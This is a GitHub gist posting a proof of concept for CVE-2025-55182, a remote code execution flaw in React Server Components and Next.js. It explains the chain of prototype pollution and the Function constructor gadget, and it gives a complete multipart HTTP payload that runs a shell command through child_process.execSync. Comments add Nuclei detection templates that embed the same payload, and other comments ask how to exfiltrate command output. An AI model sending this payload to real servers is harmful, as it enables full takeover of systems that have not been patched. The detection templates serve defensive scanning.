maple3142/CVE-2025-55182.http

POC for CVE-2025-55182 that works on Next.js 16.0.6

Core idea

Use the $@ deserialization to get a Chunk reference, and put Chunk.prototype.then as the then property of the root object. Then then would be invoked with root object as this/chunk when it is awaited/resolved.

By setting the status to RESOLVED_MODEL, now we can call initializeModelChunk with a fake chunk that is comlpetely in our control. This is particularly useful since itself and its related functions call many methods from the chunk._response object.

Exploit

The target is to trigger the Blob deserialization, which calls response._formData.get with payload from response._prefix and return the result directly. So all we need is to set response._formData.get to Function so the returned result would be a function with attacker controlled code, then put that to then again so it would be executed.

Jmehta10 · 2025-12-05T05:46:57Z

Active Detection Template (Based on PoC Payload)
This sends the adapted PoC multipart request from the first Gist, checking for exploitation indicators like timeouts or deserialization errors. It mimics the chunk pollution ($1:proto:then), resolved model status, and _formData.get gadget but with a safe echo.
Save as cve-2025-55182-detection.yaml

id: CVE-2025-55182-detection

info:
  name: React Server Components RCE Detection (Flight Deserialization)
  author: xai
  severity: critical
  description: Detects CVE-2025-55182 via crafted Flight chunk deserialization leading to potential RCE. Based on public PoC exploiting unsafe path traversal and gadget invocation.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-55182
    - https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
    - https://gist.github.com/HerringtonDarkholme/87f14efca45f7d38740be9f53849a89f
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2025-55182
  tags: cve,cve2025,react,nextjs,rce,ssrf,deserialization,flight-protocol

http:
  - method: POST
    path:
      - "{{BaseURL}}"
    headers:
      Next-Action: x  # Triggers Server Action processing (arbitrary ID)
    body: |
      ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
      Content-Disposition: form-data; name="0"

      { "then" : "$1:__proto__:then" , "status" : "resolved_model" , "reason" : -1 , "value" : "{ \"then\" : \"$B1337\" }" , "_response" :{ "_prefix" : "process.mainModule.require('child_process').execSync('echo vulnerable');" , "_formData" :{ "get" : "$1:constructor:constructor" }}}
      ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
      Content-Disposition: form-data; name="1"

      "$@0"
      ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
    matchers-condition: or
    matchers:
      - type: status
        status:
          - -1  # Connection timeout/hang (common on success)
          - 504  # Gateway timeout
      - type: word
        words:
          - "Invalid chunk reference"  # Deserialization failure (patched)
          - "ReactFlightReplyServer"  # Stack trace leak
          - "getOutlinedModel"  # Internal func from write-up
        part: body
        condition: and
      - type: dsl
        dsl:
          - "contains(body, 'prototype') && contains(body, 'constructor')"  # Pollution traces
        condition: and

    extractors:
      - type: regex
        name: action_id
        part: header
        group: 1
        regex:
          - 'Next-Action: ([a-f0-9]{40})'  # Extract if present for chaining

Passive Version Detection Template
This checks for vulnerable React/Next.js versions via common exposure points (e.g., error pages, headers, or manifest). Complements the active template for low-noise scanning. Based on affected versions from CVE (19.0.0–19.2.0) and write-up's protocol details.
Save as cve-2025-55182-versions.yaml:

id: CVE-2025-55182-versions

info:
  name: React Server Components Vulnerable Versions
  author: xai
  severity: high
  description: Detects versions of React Server Components affected by CVE-2025-55182 (unsafe Flight deserialization). Scans for version exposure in headers, errors, or JS bundles.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-55182
    - https://gist.github.com/HerringtonDarkholme/87f14efca45f7d38740be9f53849a89f  # Flight protocol analysis
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2025-55182
  tags: cve,cve2025,react,nextjs,version,rce,flight-protocol

http:
  - method: GET
    path:
      - "{{BaseURL}}"
      - "{{BaseURL}}/_next/static/chunks/app/page.js"  # Common Next.js bundle
      - "{{BaseURL}}/api/health"  # Probe for errors exposing versions

    matchers-condition: or
    matchers:
      - type: word
        words:
          - "19.0.0"
          - "19.1.0"
          - "19.1.1"
          - "19.2.0"
        part: body
        condition: and
      - type: regex
        regex:
          - "(react-server-dom-webpack|react-server-dom-parcel|react-server-dom-turbopack).*?(19\\.(0|1(\\.1)?|2)\\.0)"
        part: body
      - type: dsl
        dsl:
          - "contains(body, 'ReactFlight') && status_code == 200"  # Flight exposure without patch errors
        condition: and

    extractors:
      - type: regex
        name: react_version
        part: body
        group: 1
        regex:
          - 'react-server-dom[^"]*?([0-9.]+)'

admi-n · 2025-12-05T05:49:59Z

nb

timothyericsson · 2025-12-05T05:52:27Z

Oh skibbidy, this isn't good. Great PoC

CodeBoy2006 · 2025-12-05T05:54:57Z

nb

liuzhen9320 · 2025-12-05T06:15:21Z

good work

yyyyyyyyuuuuuuu · 2025-12-05T06:21:43Z

6

Coldtears7 · 2025-12-05T06:54:29Z

吓的我关闭了服务器

mlgzackfly · 2025-12-05T07:48:46Z

niubi

bx33661 · 2025-12-05T07:50:45Z

good job

Seven1an · 2025-12-05T07:52:23Z

wow

0xshrimantyogi · 2025-12-05T07:53:12Z

how to extract
Next-Action: x
ID

EvtDanya · 2025-12-05T08:07:06Z

is it possible to return the result of executing a command in response to a request? You will not be able to send to the collaborator due to network restrictions.

N3Dx0o · 2025-12-05T08:16:55Z

E Z one

0d000721999 · 2025-12-05T08:52:11Z

牛逼

maple3142/CVE-2025-55182.http

Select an option

No results found

Select an option

No results found

POC for CVE-2025-55182 that works on Next.js 16.0.6

Core idea

Exploit

Jmehta10 commented Dec 5, 2025

Uh oh!

admi-n commented Dec 5, 2025

Uh oh!

timothyericsson commented Dec 5, 2025

Uh oh!

CodeBoy2006 commented Dec 5, 2025

Uh oh!

liuzhen9320 commented Dec 5, 2025

Uh oh!

yyyyyyyyuuuuuuu commented Dec 5, 2025

Uh oh!

Coldtears7 commented Dec 5, 2025

Uh oh!

mlgzackfly commented Dec 5, 2025

Uh oh!

bx33661 commented Dec 5, 2025

Uh oh!

Seven1an commented Dec 5, 2025

Uh oh!

0xshrimantyogi commented Dec 5, 2025

Uh oh!

EvtDanya commented Dec 5, 2025

Uh oh!

N3Dx0o commented Dec 5, 2025

Uh oh!

0d000721999 commented Dec 5, 2025

Uh oh!

	POST / HTTP/1.1
	Host: localhost
	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
	Next-Action: x
	Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
	Content-Length: 459

	------WebKitFormBoundaryx8jO2oVc6SWP3Sad
	Content-Disposition: form-data; name="0"

	{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
	------WebKitFormBoundaryx8jO2oVc6SWP3Sad
	Content-Disposition: form-data; name="1"

	"$@0"
	------WebKitFormBoundaryx8jO2oVc6SWP3Sad--